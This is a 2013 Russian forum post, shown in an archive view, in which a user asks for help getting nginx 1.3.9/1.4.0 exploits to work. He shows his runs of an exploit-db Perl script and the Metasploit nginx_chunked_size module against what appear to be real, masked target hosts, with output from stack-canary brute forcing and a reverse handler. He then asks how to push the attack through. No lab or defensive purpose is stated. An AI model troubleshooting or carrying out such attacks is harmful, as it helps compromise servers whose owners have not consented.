PDA

Просмотр полной версии : Вопрос по эксплойтам nginx/1.3.9/1.4.0


SergioBlog
29.08.2013, 18:38
Пытался заюзать сабж (http://www.exploit-db.com/exploits/26737/).

#fix for internet exploitation, set MTU - сделал.

всё время выдаёт один и тот же результат:


root@localhost:~# perl 1.pl www.target.net 80 *.*.*.* 445
Testing if remote httpd is vulnerable % SEGV %
YES %
Finding align distance (estimate)
testing 4050 align -
\\ Align not found


После того как прочитал инфу - it has been tested against a testbed on the internet but I couldn't exploit, успокоился)

Нашел эксплойт (http://www.exploit-db.com/exploits/25775/) в metasploit под эту же версию веб-сервера.

Но в нем ведь даже не просит никакой пейлоад, он только выдаёт Canary found и на этом всё:


msf exploit(nginx_chunked_size) > set RHOST *****.com
RHOST => *****.com
msf exploit(nginx_chunked_size) > exploit
Started reverse double handler
*****.com:80 - Searching for stack canary
*****.com:80 - Assuming byte 0 0x00
*****.com:80 - Bruteforcing byte 1
[+] *****.com:80 - Byte 1 found: 0x01
*****.com:80 - Bruteforcing byte 2
[+] *****.com:80 - Byte 2 found: 0x00
*****.com:80 - Bruteforcing byte 3
[+] *****.com:80 - Byte 3 found: 0x00
[+] *****.com:80 - Canary found: 0x00000100


И выкидывает обратно в консоль. Может подскажите что не так делаю? И как можно заюзать результат выполнения второго эксплойта.